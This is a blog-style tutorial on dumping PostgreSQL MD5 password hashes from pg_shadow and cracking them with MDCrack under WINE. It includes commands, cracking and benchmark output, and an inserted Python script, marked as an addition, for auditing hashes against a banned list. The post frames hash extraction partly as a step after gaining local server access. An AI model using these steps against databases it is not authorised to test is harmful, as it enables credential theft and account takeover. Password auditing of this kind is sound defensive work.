Cracking Postgres Password Hashes with MDCrack

As far as I’m aware there aren’t many good password crackers around for PostgreSQL database password hashes.  Here are a few notes on how to crack postgres password hashes quickly using MDCrack.  Even though MDCrack is a Windows program, it works well enough under WINE for our purposes.  Linux users can therefore benefit from its impressive cracking speeds.

Where are the Hashes Kept?

Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser (usually called “postgres” or “pgsql”) to read this table.  First log into the database.  If you’ve gained local access to the Postgres server (e.g. via SSH), you’ll probably find that you don’t need a password to log in.  You will need a username and the name of a database, though.  The database “template1” always exists:

$ psql -U postgres template1

Then list the hashes:

# select usename, passwd from pg_shadow;
     usename      |  passwd               
------------------+-------------------------------------
 testuser         | md5fabb6d7172aadfda4753bf0507ed4396
...

The passwd field in this table is the string “md5” followed by MD5(password || username), where || denotes concatenation.  In this example the passwd field for testuser contains “md5” || MD5(m4gictestuser).
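
To audit a pg_shadow export of your own against this format, the following Python example (added here, not part of the original post) recomputes “md5” || MD5(password || username) for each entry of a banned-password list and reports which accounts use one. The function names, sample rows and banned list are assumptions constructed for illustration, and the SCRAM-SHA-256 prefix check goes beyond the article to recognise entries stored in the newer format.

```python
import hashlib
import re

MD5_ENTRY = re.compile(r"md5[0-9a-f]{32}")

def pg_md5_entry(password, username):
    """pg_shadow.passwd value: "md5" || MD5(password || username)."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()

def classify(passwd):
    """Name the storage format of one pg_shadow.passwd value."""
    if not passwd:
        return "no-password"
    if MD5_ENTRY.fullmatch(passwd):
        return "md5"
    if passwd.startswith("SCRAM-SHA-256$"):  # SCRAM verifier (PostgreSQL 10 and later)
        return "scram-sha-256"
    return "unrecognised"

def audit(rows, banned):
    """Map each user to a status, given (usename, passwd) rows and a banned list."""
    results = {}
    for user, passwd in rows:
        status = classify(passwd)
        # The username is the only salt, so each banned password costs
        # one MD5 per user to test. The username itself is always tested.
        if status == "md5" and any(
            pg_md5_entry(candidate, user) == passwd for candidate in [user, *banned]
        ):
            status = "md5-banned-password"
        results[user] = status
    return results

if __name__ == "__main__":
    rows = [
        ("testuser", "md5fabb6d7172aadfda4753bf0507ed4396"),  # row from the article
        ("reports", pg_md5_entry("reports", "reports")),      # constructed
        ("backup", pg_md5_entry("changeme", "backup")),        # constructed
        ("nologin", None),                                     # constructed
    ]
    banned = ["changeme", "password", "postgres"]               # constructed list
    for user, status in audit(rows, banned).items():
        print(f"{user:10} {status}")
```

Because the username is the only salt, the same password gives a different entry for each user but the same entry for a given user on every server.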

Cracking Hashes

Download the latest version of MDCrack.  If you’re running Linux, then run it under WINE.  You’ll need to tell MDCrack to append the username to the end of each candidate password:

$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

System / Starting MDCrack v1.8(3)
System / Running as MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396
System / Charset is: abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
System / Detected processor(s): 2 x unknown | 3D-Now | MMX | SSE | SSE2
System / Target hash: fabb6d7172aadfda4753bf0507ed4396
System / >> Using MD5 cores: maximal candidate/user salt size: 16/54 bytes
Info   / Press ESC for available runtime shortcuts (Ctrl-c to quit)
Info   / Thread #0: >> Using Core 2
Info   / Thread #1: >> Using Core 2
Info   / Thread #0: Candidate size:  1 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  1 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  2 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  2 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  3 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  3 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  4 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  4 ( + user salt: 8 )
Info   / Thread #1: Candidate size:  5 ( + user salt: 8 )
Info   / Thread #0: Candidate size:  5 ( + user salt: 8 )
----------------------------------------------------------/ Thread #0 (Success) ----
System / Thread #0: Collision found: m4gictestuser
...

Performance

When running under WINE, MDCrack can rattle through nearly 20 million passwords per second on a (dual core) AMDx2 4200+.  It automatically utilises both processors.

$ wine MDCrack-sse.exe --benchmark

System / Starting MDCrack v1.8(3)
System / Running as MDCrack-sse.exe --benchmark
System / Detected processor(s): 2 x 2.15 Ghz unknown | 3D-Now | MMX | SSE | SSE2
Warning/ Please wait, this benchmark should last around 1min 45s
Info   / Press Ctrl-c to skip a test

---------------------------------------------------------------/ MD4 / DH / 2 Threads ---------------------
Info   / Benchmarking ( pass #1 )... 33 178 408 ( 3.32e+007 ) h/s.
---------------------------------------------------------------/ MD5 / DH / 2 Threads ---------------------
Info   / Benchmarking ( pass #1 )... 19 703 399 ( 1.97e+007 ) h/s.
...

